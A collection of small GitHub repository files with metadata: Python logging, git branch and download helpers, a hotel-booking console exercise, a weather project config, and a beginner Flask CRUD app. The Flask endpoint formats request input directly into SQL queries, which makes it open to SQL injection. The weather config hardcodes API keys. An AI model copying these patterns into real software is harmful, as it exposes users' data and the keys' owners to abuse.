Log.log(tag, Log.Info, *logs)\n\n @staticmethod\n def d(tag=\"\", *logs):\n Log.log(tag, Log.Debug, *logs)\n\n @staticmethod\n def v(tag=\"\", *logs):\n Log.log(tag, Log.Verbose, *logs)\n\n @staticmethod\n def save_log_to_file(level=str(Verbose), tag=\"\", log=\"\"):\n line = \" \" + str(level) + \"\\t\" + str(tag) + \":\\t\" + str(log)\n line = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) + \"\\t\" + line\n print(level.color % line)\n\n @staticmethod\n def log(tag=\"\", level=Info, *logs):\n if not isinstance(level, Log.__LogLevel):\n raise TypeError(INVALID_LOG_LEVEL, level)\n\n if len(logs) == 0 and tag != \"\":\n logs = (tag,)\n tag = \"\"\n if tag:\n if Log.PARENT_TAG != \"\":\n tag = Log.PARENT_TAG + \"/\" + tag\n else:\n if Log.PARENT_TAG == \"\":\n tag = \"Log\"\n else:\n tag = Log.PARENT_TAG\n if level >= Log.DEFAULT_LOG_LEVEL and Log.Log_Enable:\n for log in logs:\n # print(level.color % str(log))\n Log.save_log_to_file(level,tag,log)\n\n\nif __name__ == '__main__':\n pass\n\n\n"
},
{
"alpha_fraction": 0.5258839726448059,
"alphanum_fraction": 0.5321351885795593,
"avg_line_length": 32.457515716552734,
"blob_id": "1db63668ec3a87b7ed7564a8e181b5e422ef46aa",
"content_id": "90908e0131eb400d70634315a85e954fc91b8856",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5135,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 153,
"path": "/Tools/src/base/tools/git_branch_helper.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nimport sys\nimport re\nimport os\nfrom collections import OrderedDict\nfrom subprocess import getstatusoutput\nfrom base.tools.log import Log\n\ndef clear_workspace(is_clear=True):\n if is_clear:\n Log.d(\"Cleaning workspace...\")\n (status, data) = getstatusoutput(\"git clean -df && git checkout .&& git stash\")\n if status == 0:\n pass\n else:\n Log.e(\"Clean workspace fail: \"+data)\n sys.exit(status)\n\n\ndef get_local_branchs():\n (status, data) = getstatusoutput(\"git branch -vv\")\n if status == 0:\n return data.split(\"\\n\")\n else:\n Log.e(\"Get local branch fail: \"+data)\n sys.exit(status)\n\n\ndef get_remote_branchs(has_local_branch=False):\n if has_local_branch:\n (status, data) = getstatusoutput(\"git pull >/dev/null && git branch -r\")\n else:\n (status, data) = getstatusoutput(\"git branch -r\")\n if status == 0:\n return data.split(\"\\n\")\n else:\n Log.e(\"Get remote branch fail: \"+data)\n sys.exit(status)\n\n\ndef create_local_branch(local_branch, remote_branch):\n if local_branch != \"\" and remote_branch != \"\":\n (status, data) = getstatusoutput(\"git checkout -b \" + local_branch + \" \" + remote_branch)\n if status == 0:\n Log.i(\"Switched to a new branch \\\"\" + local_branch + \"\\\"\")\n else:\n Log.e(\"Create local branch fail: \"+data)\n sys.exit(status)\n else:\n Log.d(\"Create local branch fail: parameter is null\")\n\n\ndef guide_user_choose(list, prompt, stop_condition=('N', 'n')):\n if type(list).__name__ == 'list' and len(list) >= 2:\n dict = OrderedDict()\n for i in range(1, len(list) + 1):\n dict[str(i)] = list[i - 1]\n for v, k in dict.items():\n Log.i(v+\" \"+k)\n try:\n choice = input(prompt)\n while True:\n if choice in dict.keys():\n return dict[choice]\n elif choice in stop_condition:\n return \"\"\n choice = input(prompt)\n except KeyboardInterrupt:\n Log.i(\"\\nQuit\")\n sys.exit()\n else:\n Log.d(\"guide_user_choose: parameter error\")\n\n\ndef guide_and_create_local_branch(list, prompt, stop_condition=('N', 'n')):\n if type(list).__name__ == 'list' and len(list) >= 2:\n branch_info = guide_user_choose(list, prompt)\n branch_info = branch_info.lstrip()\n if branch_info != \"\" and '->' not in branch_info:\n branch_name = branch_info[branch_info.rindex('/') + 1:]\n create_local_branch(branch_name, branch_info)\n else:\n Log.d(\"guide_and_create_local_branch: parameter error\")\n\n\ndef choose_branch():\n clear_workspace()\n Log.i(\"Choosing branch...\")\n local_branchs = get_local_branchs()\n if 'no branch' in local_branchs[0] or '分离自' in local_branchs[0] or '非分支' in local_branchs[0]:\n guide_and_create_local_branch(get_remote_branchs(),\n \"There is no local banch,choose remote branch to create [1,2...,N] \")\n else:\n remote_branchs = get_remote_branchs(has_local_branch=True)\n if len(local_branchs) >= 2:\n branch_info = guide_user_choose(local_branchs, \"Which local branch? [1,2...,N] \")\n if branch_info:\n branch = branch_info.replace('*', ' ').lstrip().split(\" \")[0]\n switch_branch(branch)\n else:\n guide_and_create_local_branch(remote_branchs, \"Which remote branch? [1,2...,N] \")\n elif len(local_branchs) == 1:\n Log.i(local_branchs[0])\n try:\n while True:\n char = input(\"Use this branch? [Y/N] \")\n if char in ('Y', 'y'):\n break\n if char in ('N', 'n'):\n guide_and_create_local_branch(remote_branchs, \"Which remote branch? 
[1,2...,N] \")\n break\n except KeyboardInterrupt:\n Log.i(\"\\nQuit\")\n sys.exit()\n git_pull()\n\n\ndef switch_branch(branch):\n if branch:\n (status, data) = getstatusoutput(\"git checkout \" + branch)\n if status == 0:\n Log.i(\"Switch to \" + branch)\n else:\n Log.e(\"Switch branch fail: \"+data)\n sys.exit(status)\n\n\ndef git_pull():\n (status, data) = getstatusoutput(\"git status\")\n if status == 0:\n # reset local\n git_status_info = data.split(\"\\n\")[1]\n if 'ahead' in data or \"领先\" in git_status_info:\n commit_count = re.findall('\\d+', git_status_info)[-1]\n os.system(\"git reset --hard HEAD~\" + str(commit_count))\n (status, data) = getstatusoutput(\"git pull\")\n if status == 0:\n Log.d(\"Git pull success\")\n pass\n else:\n Log.e(\"Git pull fail: \" + data)\n sys.exit(status)\n else:\n Log.e(\"Git status fail: \" + data)\n sys.exit(status)\n\n\nif __name__ == '__main__':\n choose_branch()\n pass\n"
},
{
"alpha_fraction": 0.5072054862976074,
"alphanum_fraction": 0.5706433057785034,
"avg_line_length": 35.18817138671875,
"blob_id": "1a66f313882fbd133907ca4ce5eddfe3e1ab3c1c",
"content_id": "b64d8786fa0bcc1c50f0eba1bd7e875030853370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6731,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 186,
"path": "/Tools/src/base/tools/common_tools.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nfrom base.tools.log import Log\n# from log import Log\nfrom subprocess import getstatusoutput\nimport sys\nimport urllib.request\nimport os\nimport random\n# from base.common.message import *\nimport shutil\n\nTAG = \"common_tool\"\n\n\ndef is_network_connect(host):\n if host == \"\":\n Log.e(TAG, \"host is null\")\n return False\n (status, data) = getstatusoutput(\"gethostip \" + host)\n Log.d(TAG, \"Check network:\" + data + \" status:\" + str(status))\n if status == 0:\n return True\n else:\n return False\n\n\ndef is_network_connecttt(url):\n if url == \"\":\n Log.e(TAG, \"host is null\")\n return False\n (status, data) = getstatusoutput(\"gethostip \" + url)\n Log.d(TAG, \"Check network:\" + data + \" status:\" + str(status))\n if status == 0:\n return True\n else:\n return False\n\n\ndef show_progressbar(num, total=100):\n if num >= 0 and total >= 0:\n rate = num / total\n r = '\\r[%s%s]' % (\">\" * num, \" \" * (100 - num))\n sys.stdout.write(r)\n sys.stdout.write(str(num) + '%')\n sys.stdout.flush()\n else:\n Log.e(TAG, \"show_progressbar: \" + ERROR_PARAMETER)\n\n\ndef reporthook(a, b, c):\n per = int(100.0 * a * b / c)\n if per > 100:\n per = 100\n show_progressbar(per, 100)\n\n\ndef down(url, filepath):\n if url and filepath:\n Log.d(TAG, \"down: \" + url + \" to \" + filepath)\n ua_list = [\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"\n ]\n user_agent = random.choice(ua_list)\n myheader = [('User-Agent', user_agent)]\n opener = urllib.request.build_opener()\n opener.addheaders = 
myheader\n urllib.request.install_opener(opener)\n try:\n urllib.request.urlretrieve(url, filepath, reporthook)\n print(\"\\n\")\n Log.d(TAG, \"down: \" + filepath + \" finish!\")\n return True\n except urllib.request.HTTPError as e:\n Log.e(\"down() \" + e.__str__())\n return False\n except urllib.request.URLError as e:\n Log.e(\"down() \" + e.__str__())\n return False\n except KeyError as e:\n Log.e(\"down() \" + e.__str__())\n return False\n except KeyboardInterrupt:\n Log.e(\"down() fail : user stop!\")\n return False\n else:\n Log.e(TAG, \"down() url or filename is null\")\n\n\ndef copy_file(srcfile, dstfile):\n if not os.path.exists(srcfile) and not os.path.isfile(srcfile):\n Log.e(TAG, \"copy_file() \" + srcfile + \" not exist!\")\n else:\n fpath, fname = os.path.split(dstfile)\n if not os.path.exists(fpath):\n Log.d(TAG, \"copy_file() makedirs \" + fpath)\n os.makedirs(fpath)\n shutil.copy(srcfile, dstfile)\n Log.d(TAG, \"copy_file() copy \" + srcfile + \" to \" + dstfile)\n\n\ndef move_file(srcfile, dstfile):\n if not os.path.isfile(srcfile):\n Log.e(TAG, \"move_file() \" + srcfile + \" not exist!\")\n else:\n fpath, fname = os.path.split(dstfile)\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n shutil.move(srcfile, dstfile)\n Log.d(\"move_file() move \" + srcfile + \" to \" + dstfile)\n\n\ndef is_file_exist(despath):\n if despath:\n if os.path.exists(despath) and os.path.isfile(despath):\n return True\n return False\n\n\ndef default_div_key_value(file, sep):\n key = \"\"\n value = \"\"\n _dict = {}\n for line in file:\n if line.__contains__(sep):\n (key, value) = line.strip().split(sep)\n if key and value:\n _dict[key] = value\n key = \"\"\n value = \"\"\n return _dict\n\ndef load_dict_from_file(file_path, custom_key_value=None, sep=\",\"):\n if file_path:\n _dict = {}\n try:\n with open(file_path, \"r+\") as file:\n _dict = custom_key_value(file, sep)\n return _dict\n except IOError as e:\n Log.e(TAG, \"load_dict_from_file() file isn't exist\")\n return _dict\n else:\n Log.e(TAG, \"load_dict_from_file() file_path is null\")\n return None\n\n\ndef save_dic_to_file(dic, save_file_path, sep=\",\"):\n if type(dic) == 'dict' and not dic:\n if not is_file_exist(save_file_path):\n pass\n\n try:\n with open(save_file_path(), \"w\") as file:\n pass\n # for\n\n # file.write(dic[])\n except IOError as e:\n Log.e(TAG, \"load_dict_from_file() file isn't exist\")\n\n else:\n Log.e(\"save_dic_to_file() dict is null\")\n\n\nif __name__ == '__main__':\n pass\n"
},
{
"alpha_fraction": 0.3684210479259491,
"alphanum_fraction": 0.3684210479259491,
"avg_line_length": 8.5,
"blob_id": "e19238f9e917b81f9771aabac36447d93a2c6773",
"content_id": "031ac78adbbcbc91c17f53a5c85338d2290204be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 4,
"path": "/Tools/src/base/__init__.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "\n__all__=[\n \"common\",\n \"tools\"\n]"
},
{
"alpha_fraction": 0.5106382966041565,
"alphanum_fraction": 0.5248227119445801,
"avg_line_length": 14.777777671813965,
"blob_id": "6582836e9dce40ddc1d7d0736d7d1f068c6e9b64",
"content_id": "d298812c4ff9bbb5b598f1527c17509edc672261",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 9,
"path": "/Tools/src/base/common/people.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\n\nclass People:\n\n def __init__(self,name=\"\",sex=\"男\",mail=\"\",):\n pass"
},
{
"alpha_fraction": 0.40909090638160706,
"alphanum_fraction": 0.40909090638160706,
"avg_line_length": 10.166666984558105,
"blob_id": "7f57c36277f0e1e3f97be629c65b2048375cb4c7",
"content_id": "82b855029ded93d5e7d77f275f03bc33832c8878",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 14,
"num_lines": 6,
"path": "/Tools/src/base/common/__init__.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "__all__=[\n \"project\",\n \"people\",\n \"message\",\n \"file\"\n]"
}
] | 10 |
MariyaBosy/UnitedLayer
|
https://github.com/MariyaBosy/UnitedLayer
|
e0ac2a7f81429c92db99f0e3cd0a25ad20349bee
|
2f5640305a0cbeff4078f724da543103babf4c49
|
61fa1c6fafbc6248b5526c9614beeb593ec4a69a
|
refs/heads/master
| 2022-11-18T02:59:22.238223 | 2020-06-29T21:26:23 | 2020-06-29T21:26:23 | 275,665,555 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4916166365146637,
"alphanum_fraction": 0.5025874376296997,
"avg_line_length": 31.641891479492188,
"blob_id": "f1651664011edd36d1059b0e2826f1a1d352b3ac",
"content_id": "6f331c0c3b901cb4db77d8776c44130e6bb674ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4831,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 148,
"path": "/Hotel_Assignment.py",
"repo_name": "MariyaBosy/UnitedLayer",
"src_encoding": "UTF-8",
"text": "class Hotel:\n hotel_count = 100\n\n def __init__(self, hotel_name):\n Hotel.hotel_count += 1\n self.hotel_id = Hotel.hotel_count\n self.hotel_name = hotel_name\n self.rooms = []\n\n def addNewRoom(self, room):\n self.rooms.append(room)\n\n\nHotels = {}\n\n\nclass Room:\n def __init__(self, items):\n self.items = items\n self.price = sum(int(i[1]) for i in self.items)\n\n\ndef addRoomToHotel(hotel):\n limit = 5\n i = 0\n print(\"Enter items and their values for room\")\n items = []\n while i < limit:\n item_name = input(\"ItemName:\")\n if item_name in [i[0] for i in items]:\n print(\"You have already added this item,Please add another one\")\n continue\n if item_name == '':\n print(\"Item name cannot be empty,add item\")\n continue\n item_value = input(\"Item Value in dollars:\")\n while item_value.isnumeric() == False:\n print(\"price value should be numeric!!\")\n item_value = input(\"Item Value in dollars:\")\n items.append((item_name, int(item_value)))\n i += 1\n add_more = \"\"\n if i >= limit:\n add_more = input(\"You want to add more ? (y/n) \").lower()\n if add_more == 'y':\n limit += 1\n room = Room(items=items)\n hotel.addNewRoom(room)\n print(\"Sucessfully Added Rooms\")\n\n\ndef displayAll(budget=None):\n output = \"\"\n available = False\n room_checker = 0\n for id, hotel in Hotels.items():\n if len(hotel.rooms):\n room_checker=1\n room_output = \"\"\n roomAvailableInHotel = False\n if not budget:\n output += (\"\\n*Hotel-{0} id-{1}*\\n\".format(hotel.hotel_name, id))\n for i, room in enumerate(hotel.rooms):\n if budget:\n if budget >= room.price:\n available = roomAvailableInHotel = True\n room_output += (\"\\nRoom{0} price: ${1}\\n\".format(i+1, room.price) +\n \"Items available: \" + ', '.join(item[0] for item in room.items) + \"\\n\")\n else:\n output += (\"\\nRoom {0} price: ${1}\\n\".format(i+1, room.price))\n for item in room.items:\n output += (\"{0} : ${1} \\n\".format(item[0], item[1]))\n\n if roomAvailableInHotel == True:\n output += (\"\\n*Hotel {0} id {1}*\\n\".format(hotel.hotel_name,\n id)) + room_output\n if room_checker == 0:\n print(\"-\"*50)\n print(\"No Rooms are added yet\") \n if budget != None:\n if available == False:\n print(\"Sorry, No Rooms available under ${}..\".format(budget))\n else:\n print(\"Rooms under ${}: \".format(budget))\n print(output)\n return\n\n print(output)\n\n\ndef main():\n print(\"------WELCOME------\")\n while True:\n print(\"-\"*50)\n print(\"Select Options 1,2,3 or 4\")\n print(\"1.Add Hotel\")\n print(\"2.Add a room with items and values\")\n print(\"3.Show each room with available items and values\")\n print(\"4.Enter your budget and find rooms\")\n print(\"5.Exit\")\n\n opt_no = input()\n\n if opt_no == '1':\n hotel_name = input('Enter Hotel Name-')\n hotel = Hotel(hotel_name)\n Hotels[hotel.hotel_id] = hotel\n no_of_rooms = input(\"Enter Number of rooms to be added : \")\n if no_of_rooms.isnumeric() == False:\n print(\"No of rooms should be numeric\")\n no_of_rooms = input(\"Enter Number of rooms to be added : \")\n for i in range(int(no_of_rooms)):\n addRoomToHotel(hotel)\n\n elif opt_no == '2':\n if len(Hotels) == 0:\n print(\"-\"*50)\n print(\"No hotels added,Add hotel first\")\n continue\n print(\"Select hotel- \")\n hotel_ids = list(Hotels.keys())\n print(\"*\"*20)\n print(\"Serial No\\tHotel Id\\tHotel Name\")\n for i, hotel_id in enumerate(hotel_ids):\n print(\"{} \\t \\t{} \\t \\t{}\".format(\n i, hotel_id, Hotels[hotel_id].hotel_name))\n index = int(input(\"Enter the Serial No to choose: \"))\n hotel = 
Hotels[hotel_ids[index]]\n addRoomToHotel(hotel)\n\n elif opt_no == '3':\n displayAll()\n\n elif opt_no == '4':\n budget = input(\"Enter budget in dollars: $\")\n while budget.isnumeric() == False:\n print(\"Budget should be in numeric!\")\n budget = input(\"Enter budget in dollars: $\")\n displayAll(int(budget))\n\n elif opt_no == '5':\n exit()\n\n else:\n print(\"Invalid Input!! Choose options from 1 to 5\")\n\n\nmain()\n"
},
{
"alpha_fraction": 0.7581300735473633,
"alphanum_fraction": 0.7703251838684082,
"avg_line_length": 43.727272033691406,
"blob_id": "273de291877f14516bf97c8339e552ca00040feb",
"content_id": "1327c4febcd74b790dde174449b5550605b80d3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 492,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 11,
"path": "/README.md",
"repo_name": "MariyaBosy/UnitedLayer",
"src_encoding": "UTF-8",
"text": "# UnitedLayer Assignment\n\n## Hotel Management\n An interactive command prompt based shell in python to execute following functionalities:\n 1.Add Hotel with rooms,items in each room with price choosen by user\n 2.Add rooms to existing hotels with items and values\n 3.Print out each room along with the individual items and values.\n 4.Accept a budget from the user(in $) and list only those rooms which will cost less than or equal to his budget.\n \n ## Requirements\n 1. Python version 3.x\n"
}
] | 2 |
Riicha/Weatherpy
|
https://github.com/Riicha/Weatherpy
|
206dbba76dbdb38eb3e374fa617752e3bce72fdb
|
950ee6c712b60373c0d457103b6f5a361d952dae
|
480566848b5b7392880404b9aed99bafd828d314
|
refs/heads/master
| 2020-03-20T20:11:03.829383 | 2018-06-19T22:08:57 | 2018-06-19T22:08:57 | 137,674,083 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.45679011940956116,
"alphanum_fraction": 0.7407407164573669,
"avg_line_length": 26,
"blob_id": "6fd6bf0c5d2b8e8f53a3b0321e3ff492068e8da3",
"content_id": "4d818c70a65a87b441a01ac401fdbaadf59274cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 3,
"path": "/config.py",
"repo_name": "Riicha/Weatherpy",
"src_encoding": "UTF-8",
"text": "# Enter your API key\ngkey = \"AIzaSyAG6hNdWAkx2SUWhsaVCRJRq_pqEkS_UXA\"\nowm_key = \"22ef252e688a343e0816e54c41f0e510\"\n"
},
{
"alpha_fraction": 0.7878289222717285,
"alphanum_fraction": 0.8018091917037964,
"avg_line_length": 70.52941131591797,
"blob_id": "1d278da5646a732ed30e1802ba2c1de8be9445a6",
"content_id": "b40d8c72614f0cb249b648e90d5c85e8820d5657",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 17,
"path": "/readme.md",
"repo_name": "Riicha/Weatherpy",
"src_encoding": "UTF-8",
"text": "# Generate an API hey from https://openweathermap.org/api\n# Analysis:-\nThe plot on Latitude vs Temperature shows that the temperature is highest at the equator and lowest at the poles.\nThe humidity at the equator is in the range from 50%-100%. However, the trends does not change based on the latitude.\nThere seems to be no co-relation of cloudliness with respect to the latitude.\nThe windspeed for most cities fall under 20(mph) and there seems to be no trend on the windspeed with respect to the latitude\n# Steps:\nImport the Dependencies\nThe Latitudes range considered from Equator : -90 to 90 & Longitudes range considered from Primeredian: -180 to 180\nRamdomly generate co-ordinates by setting Latitude and Longitude.\nCreate a dataframe from the random sample of Latitude and Longitude.\nCreate new columns City and Country for storing the details corresponding to the co-ordinates.\nDrop the Latitude and Longitude as the values of the nearest city and not the excat co-ordinates of the city.\nGet data for each city in unique_cities_data.(Perform API Calls)\nCreate an \"extracts\" object to get the various parameter required to form the weather data table.\nCreate a Pandas DataFrame with the results.\nPlot Graphs.\n"
}
] | 2 |
v3nividiv1ci/NAIVE_CRUD
|
https://github.com/v3nividiv1ci/NAIVE_CRUD
|
6e92acd56a96d5c2ce4ee4f72177d860b8c894a7
|
28a3be74bff75f3c3e885a607c9452c2330cec7f
|
ab0ad3f8a10b8861da2310cfb13d8a4c31369834
|
refs/heads/main
| 2023-04-03T17:48:01.730558 | 2021-04-11T06:07:33 | 2021-04-11T06:07:33 | 347,976,990 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.49127641320228577,
"alphanum_fraction": 0.4986225962638855,
"avg_line_length": 32.24528121948242,
"blob_id": "0e060de847c80761e5b5d3454170e38d152a77a0",
"content_id": "f5035123b53965026134d3dbb07053d97d232998",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5785,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 159,
"path": "/flaskr/__init__.py",
"repo_name": "v3nividiv1ci/NAIVE_CRUD",
"src_encoding": "UTF-8",
"text": "import os\r\n\r\nfrom flask import Flask\r\nfrom flask import request\r\n\r\n\r\ndef create_app(test_config=None):\r\n # create and configure the app\r\n app = Flask(__name__, instance_relative_config=True)\r\n app.config.from_mapping(\r\n SECRET_KEY='dev',\r\n DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\r\n )\r\n\r\n from . import db\r\n db.init_app(app)\r\n\r\n def query_db(query, args=(), one=False):\r\n cur = db.get_db().execute(query, args)\r\n rv = cur.fetchall()\r\n cur.close()\r\n return (rv[0] if rv else None) if one else rv\r\n\r\n if test_config is None:\r\n # load the instance config, if it exists, when not testing\r\n app.config.from_pyfile('config.py', silent=True)\r\n else:\r\n # load the test config if passed in\r\n app.config.from_mapping(test_config)\r\n\r\n # ensure the instance folder exists\r\n try:\r\n os.makedirs(app.instance_path)\r\n except OSError:\r\n pass\r\n\r\n # a simple page that says hello\r\n @app.route('/hello')\r\n def hello():\r\n return 'Hello, World!'\r\n\r\n @app.route('/')\r\n def hello_world():\r\n return 'Hello, World!'\r\n\r\n @app.route('/name', methods=['GET', 'POST'])\r\n def get_name():\r\n if request.method == 'POST':\r\n return 'hibana from POST'\r\n else:\r\n return 'hibana from GET'\r\n\r\n @app.route('/age')\r\n def get_age():\r\n return '17'\r\n\r\n ## 用户资料endpoint\r\n # R: Read 读取创建的user profile\\GET\r\n # C: Create 创建一个user profile\\POST\r\n # U: Update 更新创建的user profile\\PUT\r\n # D: Delete 删除创建的user profile\\DELETE\r\n\r\n @app.route('/userProfile', methods=['GET', 'POST', 'PUT', 'DELETE'])\r\n def userProfile():\r\n if request.method == 'GET':\r\n # name = request.args.get('name', '')\r\n uid = request.args.get('uid', 1)\r\n # print(name, flush=True)\r\n print(uid, flush=True)\r\n # 3. 写sql\r\n query = \"SELECT *FROM userProfile WHERE id={}\".format(uid)\r\n print(query, flush=True)\r\n # 通过用户的id来查询用户的资料\r\n result = query_db(query, one=True)\r\n # 1. 获取数据库连接\r\n # connection = db.get_db()\r\n # 2. 获取一个数据库的游标 cursor\r\n # 4. 执行sql\r\n # cursor = connection.execute(query)\r\n # result = cursor.fetchall()\r\n print(result, flush=True)\r\n if result is None:\r\n return dict(message=\"404 not found\")\r\n else:\r\n name = result['name']\r\n age = result['age']\r\n print(result['name'])\r\n print(result['age'])\r\n return dict(name=name, age=age)\r\n # cursor.close()\r\n # 5. 处理从数据库里读取的数据\r\n # 6. 
将数据返回给调用者\r\n return '1'\r\n\r\n # 从数据库里读取\r\n # if (name == 'hibana'):\r\n # return dict(name='hibana from GET', age=17)\r\n # else:\r\n # return dict(name='屑学弟 from GET', age=114514)\r\n elif request.method == 'POST':\r\n # name\r\n # fans\r\n print(request.json, flush=True)\r\n # print(request.form, flush=True)\r\n # print(request.data, flush=True)\r\n # name = request.form.get('name')\r\n # age = request.form.get('age')\r\n name = request.json.get('name')\r\n age = request.json.get('age')\r\n # 获取post body中的name和fans\r\n # 输入新的数据到数据库\r\n # 1.获取新的数据库连接\r\n connection = db.get_db()\r\n # 写sql\r\n query = \"INSERT INTO userProfile (name, age) values('{}', {})\".format(name, age)\r\n print(query)\r\n # 2.执行\r\n try:\r\n cursor = connection.execute(query)\r\n # 3.DML Data Manipulate Language\r\n # 当你对数据库里面的数据有改动的时候,需要commit,否则改动不会生效\r\n # execute的时候就会去数据库里面执行这条sql,如果有错误,会报错\r\n connection.commit()\r\n\r\n print(cursor.lastrowid)\r\n return dict(success=True)\r\n except:\r\n return dict(success=False, message=\"username exist\", errorCode=1)\r\n #\r\n # if (name == 'hibana'):\r\n # return dict(name='hibana from POST', age=17)\r\n # else:\r\n # return dict(name='懒狗 from POST', age=1919810)\r\n # return '1'\r\n elif request.method == 'PUT':\r\n print(request.json, flush=True)\r\n uid = request.args.get('uid', 1)\r\n name = request.json.get('name')\r\n age = request.json.get('age')\r\n connection = db.get_db()\r\n query = \"UPDATE userProfile SET name = '{}', age = {} WHERE id = {}\".format(name, age, uid)\r\n print(query)\r\n try:\r\n cursor = connection.execute(query)\r\n connection.commit()\r\n print(cursor.lastrowid)\r\n return dict(success=True)\r\n except:\r\n return dict(success=False, message=\"username already existed\", errorCode=1)\r\n return 1\r\n elif request.method == 'DELETE':\r\n uid = request.args.get('uid', 1)\r\n connection = db.get_db()\r\n query = \"DELETE from userProfile WHERE id = {}\".format(uid)\r\n connection.execute(query)\r\n connection.commit()\r\n return dict(success=True)\r\n\r\n return app\r\n"
},
{
"alpha_fraction": 0.734000027179718,
"alphanum_fraction": 0.7919999957084656,
"avg_line_length": 98.80000305175781,
"blob_id": "e2dd8b0cb5f78ca5c529f19ae423e3b6a62cec5c",
"content_id": "b3ce18caec26877e6cf09bfa376019265ac14017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 409,
"num_lines": 5,
"path": "/README.md",
"repo_name": "v3nividiv1ci/NAIVE_CRUD",
"src_encoding": "UTF-8",
